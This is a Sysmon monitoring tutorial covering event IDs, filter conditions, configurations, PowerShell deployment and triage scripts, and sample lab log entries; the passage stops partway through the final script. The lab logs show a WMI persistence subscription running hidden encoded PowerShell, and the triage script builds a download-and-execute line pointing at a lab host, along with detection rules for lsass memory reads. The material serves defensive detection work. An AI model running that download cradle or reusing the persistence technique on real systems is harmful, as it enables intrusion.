Sysmon (System Monitor) is a Windows service that, once installed, monitors system activity and writes it to the Windows Event Log. It differs from antivirus or a HIDS (Host-based Intrusion Detection System) in that it does not block anything by itself: it records deeper telemetry (process creation with hashes and parent process, network connections, driver and image loads, raw disk reads, registry and named-pipe activity) and lets you define precisely which events are recorded, which is what makes it valuable against sophisticated and targeted attacks.
Sysmon consists of a kernel device driver and a user-mode service that run in the background and are loaded at every boot.
Sysmon tags and events

The Tag column is the element name used under `<EventFiltering>` in a configuration file. Event IDs 4 and 16 have no tag: they report Sysmon's own service and configuration changes and cannot be filtered out. IDs 19 to 21 exist from Sysmon 6.10 onwards (they appear in the sample log entries later in this post).

ID | Tag | Event |
---|---|---|
1 | ProcessCreate | Process create |
2 | FileCreateTime | File creation time changed |
3 | NetworkConnect | Network connection detected |
4 | n/a | Sysmon service state change (cannot be filtered) |
5 | ProcessTerminate | Process terminated |
6 | DriverLoad | Driver loaded |
7 | ImageLoad | Image loaded |
8 | CreateRemoteThread | CreateRemoteThread detected |
9 | RawAccessRead | RawAccessRead detected |
10 | ProcessAccess | Process accessed |
11 | FileCreate | File created |
12 | RegistryEvent | Registry object added or deleted |
13 | RegistryEvent | Registry value set |
14 | RegistryEvent | Registry object renamed |
15 | FileCreateStreamHash | File stream created |
16 | n/a | Sysmon configuration change (cannot be filtered) |
17 | PipeEvent | Named pipe created |
18 | PipeEvent | Named pipe connected |
19 | WmiEvent | WmiEventFilter activity detected |
20 | WmiEvent | WmiEventConsumer activity detected |
21 | WmiEvent | WmiEventConsumerToFilter activity detected |
Sysmon XML conditions

Every rule under an event tag names a field of that event (Image, ParentImage, Signature, TargetImage, ...) and carries an optional `condition` attribute. Matching is case-insensitive. Rules inside one block are OR'd: the block matches if any rule matches. What a match means is decided by the block's `onmatch` attribute: `include` logs only events that match, `exclude` logs every event except those that match. So an empty `<ProcessTerminate onmatch="include"/>` silences Event ID 5 entirely, and an empty `<CreateRemoteThread onmatch="exclude"/>` logs every Event ID 8.

Condition | Description |
---|---|
is | Default; values are equal |
is not | Values are different |
contains | The field contains this value (substring match) |
excludes | The field does not contain this value |
begin with | The field begins with this value |
end with | The field ends with this value |
less than | Lexicographical comparison is less than zero |
more than | Lexicographical comparison is more than zero |
image | Match an image path (full path or only image name). For example: lsass.exe will match c:\windows\system32\lsass.exe |
How to install Sysmon
1. Download Sysmon from Microsoft (the archive contains Sysmon.exe and Sysmon64.exe):

```
https://technet.microsoft.com/en-us/sysinternals/sysmon
```

2. Open cmd.exe as administrator.
3. Install the Sysmon service with:

```
sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n
```

- -i installs the service (and the SysmonDrv kernel driver)
- -accepteula accepts the license agreement
- -h sets the hash algorithms used for image identification
- -l logs module (DLL) loads (Event ID 7)
- -n logs network connections (Event ID 3)

4. Open Event Viewer as administrator:

```
eventvwr
```

5. Go to Applications and Services Logs > Microsoft > Windows > Sysmon > Operational; the Sysmon events are there.
6. To see which configuration Sysmon is currently running, use:

```
sysmon.exe -c
```
7. A custom configuration can be applied as well. The one I use here is:

```xml
<Sysmon schemaversion="3.30">
  <!-- Capture all hashes -->
  <HashAlgorithms>*</HashAlgorithms>
  <EventFiltering>
    <!-- Event ID 1 == Process Creation. Log all newly created processes except -->
    <ProcessCreate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">btool.exe</Image>
      <Image condition="contains">SnareCore</Image>
      <Image condition="contains">nxlog</Image>
      <Image condition="contains">winlogbeat</Image>
      <Image condition="contains">Microsoft Monitoring Agent\Agent\MonitoringHost.exe</Image>
      <Image condition="begin with">C:\Program Files\NVIDIA Corporation\Display\</Image>
      <Image condition="is">C:\Program Files\Dell\SupportAssist\pcdrcui.exe</Image>
      <Image condition="is">C:\Program Files\Dell\SupportAssist\koala.exe</Image>
      <Image condition="begin with">C:\Program Files\Windows Defender</Image>
      <Image condition="is">C:\Windows\System32\audiodg.exe</Image>
      <Image condition="is">C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
      <Image condition="end with">\Sysmon.exe</Image>
    </ProcessCreate>
    <!-- Event ID 2 == File Creation Time. Do not log modified file creation times (empty include = log nothing) -->
    <FileCreateTime onmatch="include"/>
    <!-- Event ID 3 == Network Connection. Log all initiated network connections except -->
    <NetworkConnect onmatch="exclude">
      <Image condition="is">C:\Program Files\Microsoft Office\Office15\ONENOTE.EXE</Image>
      <Image condition="end with">Spotify.exe</Image>
      <Image condition="end with">OneDrive.exe</Image>
      <Image condition="end with">AppData\Roaming\Dashlane\Dashlane.exe</Image>
      <Image condition="end with">AppData\Roaming\Dashlane\DashlanePlugin.exe</Image>
      <Image condition="end with">winlogbeat.exe</Image>
      <Image condition="is">C:\Windows\System32\spoolsv.exe</Image>
      <Image condition="is">C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe</Image>
      <Image condition="is">C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe</Image>
      <Image condition="is">C:\Windows\System32\CompatTelRunner.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Image>
      <Image condition="is">C:\Windows\System32\mmc.exe</Image>
    </NetworkConnect>
    <!-- Event ID 5 == Process Terminated. Do not log process termination -->
    <ProcessTerminate onmatch="include"/>
    <!-- Event ID 6 == Driver Loaded. Log all drivers except those with the following signers -->
    <DriverLoad onmatch="exclude">
      <Signature condition="contains">microsoft</Signature>
      <Signature condition="contains">windows</Signature>
      <Signature condition="is">VMware</Signature>
      <Signature condition="begin with">Intel </Signature>
    </DriverLoad>
    <!-- Event ID 7 == Image Loaded. Log everything except -->
    <ImageLoad onmatch="exclude">
      <Image condition="image">chrome.exe</Image>
      <Image condition="image">vmtoolsd.exe</Image>
      <Image condition="image">Sysmon.exe</Image>
      <Image condition="image">mmc.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
      <Image condition="is">C:\Windows\System32\taskeng.exe</Image>
    </ImageLoad>
    <!-- Event ID 8 == CreateRemoteThread. Log everything -->
    <CreateRemoteThread onmatch="exclude" />
    <!-- Event ID 9 == RawAccessRead. Log everything except -->
    <RawAccessRead onmatch="exclude">
      <Image condition="is">C:\Program Files\VMware\VMware Tools\vmtoolsd.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
      <Image condition="end with">\Sysmon.exe</Image>
    </RawAccessRead>
    <!-- Event ID 10 == ProcessAccess. Log everything except -->
    <ProcessAccess onmatch="exclude">
      <SourceImage condition="is">C:\Program Files\VMware\VMware Tools\vmtoolsd.exe</SourceImage>
      <SourceImage condition="is">C:\Windows\system32\taskeng.exe</SourceImage>
      <SourceImage condition="is">C:\Windows\system32\lsass.exe</SourceImage>
      <SourceImage condition="image">Sysmon.exe</SourceImage>
    </ProcessAccess>
    <!-- Event ID 11 == FileCreate. Log everything except -->
    <FileCreate onmatch="exclude">
      <Image condition="image">SearchIndexer.exe</Image>
      <Image condition="image">winlogbeat.exe</Image>
      <Image condition="is">C:\Windows\system32\mmc.exe</Image>
      <Image condition="is">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Image>
    </FileCreate>
    <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue set, RegObject renamed. Log everything except -->
    <RegistryEvent onmatch="exclude">
      <Image condition="is">C:\Program Files\VMware\VMware Tools\vmtoolsd.exe</Image>
      <Image condition="is">C:\Windows\system32\mmc.exe</Image>
      <Image condition="is">C:\Windows\system32\taskeng.exe</Image>
      <Image condition="is">C:\Windows\System32\svchost.exe</Image>
      <Image condition="is">C:\Windows\system32\lsass.exe</Image>
      <Image condition="is">C:\Windows\Sysmon.exe</Image>
    </RegistryEvent>
    <!-- Event ID 15 == FileStream Created. Do not log file stream creation (nor hash the stream contents) -->
    <FileCreateStreamHash onmatch="include" />
    <!-- Event ID 17,18 == PipeEvent. Log named pipe created and named pipe connected -->
    <PipeEvent onmatch="exclude" />
  </EventFiltering>
</Sysmon>
```
To log everything, every tag gets an empty `exclude` block:

```xml
<Sysmon schemaversion="3.30">
  <!-- Capture all hashes -->
  <HashAlgorithms>*</HashAlgorithms>
  <EventFiltering>
    <ProcessCreate onmatch="exclude"/>
    <FileCreateTime onmatch="exclude"/>
    <NetworkConnect onmatch="exclude"/>
    <ProcessTerminate onmatch="exclude"/>
    <DriverLoad onmatch="exclude"/>
    <ImageLoad onmatch="exclude"/>
    <CreateRemoteThread onmatch="exclude" />
    <RawAccessRead onmatch="exclude"/>
    <ProcessAccess onmatch="exclude"/>
    <FileCreate onmatch="exclude"/>
    <RegistryEvent onmatch="exclude"/>
    <FileCreateStreamHash onmatch="exclude" />
    <PipeEvent onmatch="exclude" />
  </EventFiltering>
</Sysmon>
```
At the other extreme, a much more selective configuration that records only process creations by, or spawned from, the commonly abused interpreters and admin tools (the original listed `cscirpt.exe`, a misspelling that would never match; it is `cscript.exe` below):

```xml
<Sysmon schemaversion="3.20">
  <HashAlgorithms>md5,imphash</HashAlgorithms>
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <Image condition="contains">cmd.exe</Image>
      <Image condition="contains">powershell.exe</Image>
      <Image condition="contains">wmic.exe</Image>
      <Image condition="contains">cscript.exe</Image>
      <Image condition="contains">wscript.exe</Image>
      <Image condition="contains">net.exe</Image>
      <Image condition="contains">psexec.exe</Image>
      <ParentImage condition="contains">cmd.exe</ParentImage>
      <ParentImage condition="contains">powershell.exe</ParentImage>
      <ParentImage condition="contains">wmic.exe</ParentImage>
      <ParentImage condition="contains">cscript.exe</ParentImage>
      <ParentImage condition="contains">wscript.exe</ParentImage>
      <ParentImage condition="contains">net.exe</ParentImage>
      <ParentImage condition="contains">psexec.exe</ParentImage>
      <ParentImage condition="contains">explorer.exe</ParentImage>
    </ProcessCreate>
  </EventFiltering>
</Sysmon>
```
The first configuration follows the reference tables above and excludes a number of known-noisy processes so that monitoring produces fewer false positives. Two caveats worth knowing before copying it: `contains` is a plain substring match, so `net.exe` also matches `dotnet.exe`; and the DriverLoad exclusion keys on the signer name only (Signature contains `microsoft`), not on SignatureStatus, so a driver whose signature is invalid but whose signer string contains that word is still dropped. I saved the configuration as start.xml and loaded it with:

```
sysmon -c start.xml
```
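Before applying a configuration with `-c`, it is worth dry-running it against a handful of representative events to see exactly what would and would not be logged. The script below is an added example (not part of the original post, not Sysmon's own code): it re-implements the condition table and the include/exclude semantics from the conditions section above in PowerShell, assuming one filter block per event type (as in the schema 3.x configurations above) and that the rules inside a block are OR'd. The configuration and the sample events in it are constructed for the demo.

```powershell
# Added example: dry-run Sysmon rule semantics against sample events.

function Test-SysmonCondition {
    param([string]$Condition, [string]$Value, [string]$Field)
    # Sysmon matching is case-insensitive, so every comparison below ignores case.
    switch ($Condition) {
        'is'         { return $Field -eq $Value }
        'is not'     { return $Field -ne $Value }
        'contains'   { return $Field.IndexOf($Value, [StringComparison]::OrdinalIgnoreCase) -ge 0 }
        'excludes'   { return $Field.IndexOf($Value, [StringComparison]::OrdinalIgnoreCase) -lt 0 }
        'begin with' { return $Field.StartsWith($Value, [StringComparison]::OrdinalIgnoreCase) }
        'end with'   { return $Field.EndsWith($Value, [StringComparison]::OrdinalIgnoreCase) }
        'less than'  { return [string]::Compare($Field, $Value, $true) -lt 0 }
        'more than'  { return [string]::Compare($Field, $Value, $true) -gt 0 }
        'image'      {  # full path if the value has a separator, otherwise file name only
            if ($Value -match '[\\/]') { return $Field -eq $Value }
            return ($Field -replace '^.*[\\/]', '') -eq $Value
        }
        default      { throw "Unknown condition '$Condition'" }
    }
}

function Test-SysmonEventLogged {
    param([xml]$Config, [string]$EventType, [hashtable]$Event)
    $block = $Config.Sysmon.EventFiltering.SelectSingleNode($EventType)
    if ($null -eq $block) { throw "No <$EventType> block in this config" }
    $matched = $false
    foreach ($rule in $block.ChildNodes) {
        if ($rule.NodeType -ne 'Element') { continue }        # skip XML comments
        $field = $rule.LocalName                               # Image, ParentImage, Signature, ...
        $cond  = $rule.GetAttribute('condition')
        if (-not $cond) { $cond = 'is' }                       # "is" is the default condition
        if (-not $Event.ContainsKey($field)) { continue }      # rule on a field this event lacks
        if (Test-SysmonCondition $cond $rule.InnerText $Event[$field]) { $matched = $true; break }
    }
    # include: only matched events are logged; exclude: everything except matched events
    if ($block.GetAttribute('onmatch') -eq 'include') { return $matched }
    return -not $matched
}

# Constructed config: a cut-down version of the selective configuration above,
# with the cscirpt.exe typo left in on purpose to show that it never matches.
[xml]$config = @'
<Sysmon schemaversion="3.30">
  <HashAlgorithms>*</HashAlgorithms>
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <Image condition="image">cmd.exe</Image>
      <Image condition="contains">powershell.exe</Image>
      <Image condition="contains">cscirpt.exe</Image>
      <ParentImage condition="image">explorer.exe</ParentImage>
    </ProcessCreate>
    <FileCreateTime onmatch="include"/>
    <NetworkConnect onmatch="exclude">
      <Image condition="end with">\chrome.exe</Image>
    </NetworkConnect>
  </EventFiltering>
</Sysmon>
'@

# Constructed events (only the fields the rules look at).
$events = @(
    @{ Type='ProcessCreate';  Image='C:\Windows\System32\cmd.exe';                               ParentImage='C:\Windows\System32\services.exe' }
    @{ Type='ProcessCreate';  Image='C:\Windows\System32\cscript.exe';                           ParentImage='C:\Windows\System32\services.exe' }
    @{ Type='ProcessCreate';  Image='C:\Users\alice\AppData\Local\Temp\update.exe';              ParentImage='C:\Windows\explorer.exe' }
    @{ Type='ProcessCreate';  Image='C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe';  ParentImage='C:\Windows\System32\svchost.exe' }
    @{ Type='FileCreateTime'; Image='C:\Program Files\Mozilla Firefox\firefox.exe' }
    @{ Type='NetworkConnect'; Image='C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' }
    @{ Type='NetworkConnect'; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }
)

foreach ($e in $events) {
    $logged = Test-SysmonEventLogged -Config $config -EventType $e.Type -Event $e
    '{0,-15} {1,-5} {2}' -f $e.Type, $(if ($logged) { 'LOG' } else { 'drop' }), $e.Image
}
```

Reading the output: cmd.exe is logged via the `image` rule, cscript.exe is dropped because the rule is misspelled, update.exe is logged purely because its parent is explorer.exe (which is why that ParentImage rule captures nearly everything a user launches), the empty `FileCreateTime` include drops Event ID 2 outright, and the `NetworkConnect` exclude lets everything through except chrome.exe.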
Once logging is active, the events are written to:

```
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
```

The log can also be browsed with SysmonView.
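The whole procedure as one script, as an added example (not from the original post): it verifies the Sysmon binary's Authenticode signature before handing it a kernel driver, installs or updates the configuration, confirms both the service and the SysmonDrv driver are running, dumps the loaded configuration, and summarises event volume per ID so the exclusion rules can be tuned. The paths for the binary and the configuration are assumptions for this example; run it from an elevated PowerShell prompt.

```powershell
# Added example: deploy Sysmon with start.xml and verify the result.
#Requires -RunAsAdministrator
$SysmonExe  = 'C:\Tools\Sysmon\Sysmon64.exe'   # assumed location of the extracted download
$ConfigPath = 'C:\Tools\Sysmon\start.xml'      # assumed location of the configuration above
$LogName    = 'Microsoft-Windows-Sysmon/Operational'

# 1. Verify the binary is the Microsoft-signed one before installing a driver from it.
$sig = Get-AuthenticodeSignature -FilePath $SysmonExe
if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft Corporation') {
    throw "Refusing to install: signature status of $SysmonExe is '$($sig.Status)'"
}

# 2. Fresh install with the config, or just push the config if Sysmon is already there.
$existing = Get-Service -Name Sysmon, Sysmon64 -ErrorAction SilentlyContinue
if ($existing) { & $SysmonExe -c $ConfigPath } else { & $SysmonExe -accepteula -i $ConfigPath }
if ($LASTEXITCODE -ne 0) { throw "sysmon exited with code $LASTEXITCODE" }

# 3. Both halves must be up: the user-mode service and the SysmonDrv kernel driver.
$svc = Get-Service -Name Sysmon, Sysmon64 -ErrorAction SilentlyContinue | Where-Object Status -eq 'Running'
$drv = Get-CimInstance Win32_SystemDriver -Filter "Name='SysmonDrv'"
if (-not $svc -or $drv.State -ne 'Running') { throw 'Sysmon service or SysmonDrv driver is not running' }

# 4. Print the configuration Sysmon actually loaded; compare it with start.xml.
& $SysmonExe -c

# 5. Event ID 4 records service state changes; the latest one should report State: Started.
Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 4 } -MaxEvents 1 |
    Select-Object TimeCreated, Message

# 6. Volume per event ID over the last 15 minutes: the noisiest IDs are where exclusions pay off.
$since = (Get-Date).AddMinutes(-15)
Get-WinEvent -FilterHashtable @{ LogName = $LogName; StartTime = $since } -ErrorAction SilentlyContinue |
    Group-Object Id | Sort-Object Count -Descending |
    Select-Object @{ n = 'EventId'; e = { $_.Name } }, Count
```

Step 6 is the feedback loop for the exclusion lists: if Event ID 7 or 11 dominates, look at which Image values produce it and add the offenders to the matching `exclude` block rather than turning the event type off.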
Sample Sysmon log entries

The entries below were captured on a lab host (GenEric-PC). Rows 19 to 21 are the three events a WMI permanent event subscription produces (filter, consumer, and the binding that ties them together); row 20 carries the encoded PowerShell that the consumer runs.

EventID | Tag | Available Since | Example |
---|---|---|---|
1 | ProcessCreate | – | CommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding CurrentDirectory: C:\Windows\system32\ Hashes: SHA1=9F5A4796B58D8B104A1C0F5A63DAF0032B947966, MD5=619A67C9F617B7E69315BB28ECD5E1DF, SHA256=F34F231D117CCDFEBB9CB35C8D6FDFA7051DA27FDC1204FCCFF361FC0B13A0FF, IMPHASH=C1E65C7FF153F2C2E6A7E93706AE226A Image: C:\Windows\System32\wbem\WmiPrvSE.exe IntegrityLevel: System LogonGuid: 49F1AF32-4E56-59BD-0000-0020E4030000 LogonId: 0x000003e4 ParentCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch ParentImage: C:\Windows\System32\svchost.exe ParentProcessGuid: 49F1AF32-4E56-59BD-0000-00104E830000 ParentProcessId: 600 ProcessGuid: 49F1AF32-882C-59C1-0000-00108FA14600 ProcessId: 3204 TerminalSessionId: 0 User: NT AUTHORITY\NETWORK SERVICE UtcTime: 2017-09-19 21:12:12.727 |
2 | FileCreateTime | – | CreationUtcTime: 2017-09-18 07:50:46.104 Image: C:\Program Files\Mozilla Firefox\firefox.exe PreviousCreationUtcTime: 2017-09-19 21:16:37.524 ProcessGuid: 49F1AF32-8663-59C1-0000-001062293400 ProcessId: 1396 TargetFilename: C:\Users\Gen Eric\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BE2KF8TBMP786WCR1WSN.temp UtcTime: 2017-09-19 21:16:37.540 |
3 | NetworkConnect | – | DestinationHostname: DestinationIp: 192.168.56.1 DestinationIsIpv6: false DestinationPort: 8080 DestinationPortName: Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Initiated: true ProcessGuid: 49F1AF32-8A4D-59C1-0000-001042F00A00 ProcessId: 3888 Protocol: tcp SourceHostname: GenEric-PC SourceIp: 192.168.56.101 SourceIsIpv6: false SourcePort: 49252 SourcePortName: User: NT AUTHORITY\SYSTEM UtcTime: 2017-09-19 21:25:51.846 |
4 | – | – | SchemaVersion: 3.40 State: Started UtcTime: 2017-09-19 21:17:08.820 Version: 6.10 |
5 | ProcessTerminate | – | Image: C:\Windows\SysWOW64\runonce.exe ProcessGuid: 49F1AF32-8956-59C1-0000-001099830200 ProcessId: 2100 UtcTime: 2017-09-19 21:17:12.434 |
6 | DriverLoad | – | Hashes: SHA1=706C6BB3AD9E24F148EE110984814897383BDC32, MD5=9B38580063D281A99E68EF5813022A5F, SHA256=D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA, IMPHASH=6126B7C1BE78663C7C2231BA8607D577 ImageLoaded: C:\Windows\System32\drivers\dfsc.sys Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2017-09-19 21:17:01.171 |
7 | ImageLoad | – | Hashes: SHA1=49D4F6E96FD4D810D26E5166991070CFC32298AB, MD5=FBE1086227040618A569C27F74A12F3D, SHA256=1631C78ED9C35EB62FC66ECBB536B251329134A866A783875AEE7D85C7DD0E02, IMPHASH=1EC347D133DF2FE4DA3E5F8944CAEAE8 Image: C:\Windows\System32\CompatTelRunner.exe ImageLoaded: C:\Windows\System32\ws2_32.dll ProcessGuid: 49F1AF32-884D-59C1-0000-001044E84800 ProcessId: 3236 Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2017-09-19 21:12:45.821 |
8 | CreateRemoteThread | – | NewThreadId: 3384 SourceImage: C:\Windows\System32\wbem\WmiPrvSE.exe SourceProcessGuid: 49F1AF32-8955-59C1-0000-00105DF90100 SourceProcessId: 1956 StartAddress: 0x0000000077533860 StartFunction: StartModule: C:\Windows\SYSTEM32\ntdll.dll TargetImage: C:\Windows\System32\wbem\WmiApSrv.exe TargetProcessGuid: 49F1AF32-89D7-59C1-0000-00106D100A00 TargetProcessId: 3196 UtcTime: 2017-09-19 21:19:20.228 |
9 | RawAccessRead | – | Device: \Device\HarddiskVolume2 Image: C:\Windows\System32\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 UtcTime: 2017-09-19 21:17:01.359 |
10 | ProcessAccess | – | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+4bf9a\|C:\Windows\system32\KERNELBASE.dll+189b7\|C:\Windows\System32\VBoxService.exe+1009d\|C:\Windows\System32\VBoxService.exe+11374\|C:\Windows\System32\VBoxService.exe+1161e\|C:\Windows\System32\VBoxService.exe+e7fb\|C:\Windows\System32\VBoxService.exe+f27b\|C:\Windows\System32\VBoxService.exe+181e\|C:\Windows\System32\VBoxService.exe+2d4af\|C:\Windows\System32\VBoxService.exe+30bd2\|C:\Windows\System32\VBoxService.exe+6c24b\|C:\Windows\System32\VBoxService.exe+6c2df\|C:\Windows\system32\kernel32.dll+159cd\|C:\Windows\SYSTEM32\ntdll.dll+2a561 GrantedAccess: 0x1400 SourceImage: C:\Windows\System32\VBoxService.exe SourceProcessGUID: 49F1AF32-4E56-59BD-0000-00108BCA0000 SourceProcessId: 664 SourceThreadId: 696 TargetImage: C:\Windows\system32\csrss.exe TargetProcessGUID: 49F1AF32-4E55-59BD-0000-0010FB560000 TargetProcessId: 340 UtcTime: 2017-09-19 21:14:34.790 |
11 | FileCreate | – | CreationUtcTime: 2017-09-07 21:43:40.859 Image: C:\Windows\System32\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 TargetFilename: C:\pagefile.sys UtcTime: 2017-09-19 21:17:02.343 |
12 | RegistryEvent | – | EventType: CreateKey Image: C:\Windows\Sysmon.exe ProcessGuid: 49F1AF32-4E59-59BD-0000-001021720100 ProcessId: 1332 TargetObject: HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs UtcTime: 2017-09-19 21:14:42.915 |
13 | RegistryEvent | – | Details: DWORD (0xffffffff) EventType: SetValue Image: C:\Windows\system32\CompatTelRunner.exe ProcessGuid: 49F1AF32-884D-59C1-0000-001093F04800 ProcessId: 616 TargetObject: \REGISTRY\A\{5F82DC26-E525-476B-D7F4-86FAF0C848CE}\Root\DeviceCensus\WU\AppStoreAutoUpdatePolicy UtcTime: 2017-09-19 21:12:46.212 |
14 | RegistryEvent | – | EventType: RenameKey Image: C:\Windows\regedit.exe NewName: \REGISTRY\MACHINE\SOFTWARE\Macromedia\RegistryRenamed ProcessGuid: 49F1AF32-22C3-59C2-0000-001085501200 ProcessId: 3800 TargetObject: HKLM\SOFTWARE\Macromedia\FlashPlayerActiveX UtcTime: 2017-09-20 08:14:21.370 |
15 | FileCreateStreamHash | – | CreationUtcTime: 2017-09-20 08:06:11.801 Hash: SHA1=17DC34358A2BF7E7D6E78268B3CA7493915BB325, MD5=9D9D384EF6546192D60EFDBB8397CD2D, SHA256=3455A37D9006F5325AC6208E874AE8149FECD8631D981EE78B3AD5B06AD648AB, IMPHASH=00000000000000000000000000000000 Image: C:\Windows\system32\cmd.exe ProcessGuid: 49F1AF32-21E3-59C2-0000-00106B811000 ProcessId: 4000 TargetFilename: C:\Users\GENERI~1\AppData\Local\Temp\test.txt:malicious.txt UtcTime: 2017-09-20 08:10:29.925 |
16 | – | – | Not seen |
17 | PipeEvent | v6.0 | Image: C:\Windows\system32\svchost.exe PipeName: \PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER ProcessGuid: 49F1AF32-8952-59C1-0000-0010CAE70000 ProcessId: 920 UtcTime: 2017-09-19 21:17:20.970 |
18 | PipeEvent | v6.0 | Image: C:\Windows\Explorer.EXE PipeName: \lsass ProcessGuid: 49F1AF32-8955-59C1-0000-00106FEA0100 ProcessId: 1932 UtcTime: 2017-09-19 21:24:27.017 |
19 | WmiEvent | v6.10 | EventNamespace: root\CimV2 EventType: WmiFilterEvent Name: MaliciousSubscription Operation: Created Query: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325 User: GenEric-PC\Gen Eric UtcTime: 2017-09-19 21:10:00.401 |
20 | WmiEvent | v6.10 | Destination: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -enc JABHAHIAbwBVAFAAUABvAGwAaQBjAHkAUwBlAFQAVA […] AkAEsAKQApAHwASQBFAFgA EventType: WmiConsumerEvent Name: MaliciousSubscription Operation: Created Type: Command Line User: GenEric-PC\Gen Eric UtcTime: 2017-09-19 21:10:00.431 |
21 | WmiEvent | v6.10 | Consumer: CommandLineEventConsumer.Name="MaliciousSubscription" EventType: WmiBindingEvent Filter: __EventFilter.Name="MaliciousSubscription" Operation: Created User: GenEric-PC\Gen Eric UtcTime: 2017-09-19 21:10:11.878 |
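What a responder does with rows like these, as an added example (not from the original post): parse each event's XML into name/value fields, then run three detections that map directly onto the table above, decoding the `-enc` payload in a PowerShell command line (rows 1, 3 and 20), flagging ProcessAccess to lsass.exe with PROCESS_VM_READ (0x10) in GrantedAccess (the benign row 10 carries 0x1400 and is not flagged), and joining the WMI filter, consumer and binding (rows 19 to 21) into one persistence finding. The events are constructed to mirror the rows; the encoded payload is generated inside the script and is not the one elided in row 20.

```powershell
# Added example: field extraction and triage for Sysmon events.

function ConvertFrom-SysmonEventXml {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Xml)
    process {
        $x  = [xml]$Xml
        $id = $x.Event.System.EventID
        if ($id -is [System.Xml.XmlElement]) { $id = $id.'#text' }   # EventID may carry attributes
        $fields = @{ EventID = [int]$id }
        foreach ($d in $x.Event.EventData.Data) { $fields[$d.GetAttribute('Name')] = $d.'#text' }
        $fields
    }
}

function Get-EncodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...); the argument is base64(UTF-16LE)
    if ($CommandLine -match '(?i)\s-e[ncodema]*\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) } catch { return $null }
    }
}

function Find-SysmonIndicators {
    param([hashtable[]]$Events)
    $filters = @{}; $consumers = @{}      # WMI subscription pieces from events 19/20, keyed by Name
    foreach ($e in $Events) {
        switch ($e.EventID) {
            1  { $decoded = Get-EncodedCommand $e.CommandLine
                 if ($decoded) { [pscustomobject]@{ Indicator='EncodedPowerShell'; Subject=$e.Image; Detail=$decoded } } }
            10 { # PROCESS_VM_READ (0x10) on lsass.exe is what credential dumpers need
                 if ($e.TargetImage -like '*\lsass.exe' -and (([int]$e.GrantedAccess) -band 0x10)) {
                     [pscustomobject]@{ Indicator='LsassMemoryRead'; Subject=$e.SourceImage; Detail="GrantedAccess=$($e.GrantedAccess)" } } }
            19 { $filters[$e.Name]   = $e.Query }
            20 { $consumers[$e.Name] = $e.Destination }
            21 { # the binding names both halves; join them so the finding shows trigger and action together
                 $f = ''; if ($e.Filter   -match 'Name="([^"]+)"') { $f = $Matches[1] }
                 $c = ''; if ($e.Consumer -match 'Name="([^"]+)"') { $c = $Matches[1] }
                 $action = $consumers[$c]; $decoded = Get-EncodedCommand $action
                 if ($decoded) { $action = $decoded }
                 [pscustomobject]@{ Indicator='WmiPersistence'; Subject=$e.User; Detail="when [$($filters[$f])] run [$action]" } }
        }
    }
}

# Constructed sample events in the XML shape Get-WinEvent's ToXml() returns.
function New-SampleEvent {
    param([int]$Id, [hashtable]$Data)
    $rows = ($Data.GetEnumerator() | ForEach-Object { "<Data Name='$($_.Key)'>$([Security.SecurityElement]::Escape($_.Value))</Data>" }) -join ''
    "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon'/><EventID>$Id</EventID></System><EventData>$rows</EventData></Event>"
}
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.1:8080/a')"   # constructed
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$psExe = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sample = @(
    (New-SampleEvent 1  @{ Image=$psExe; CommandLine="powershell.exe -NonI -W hidden -enc $b64"; User='GenEric-PC\Gen Eric' })
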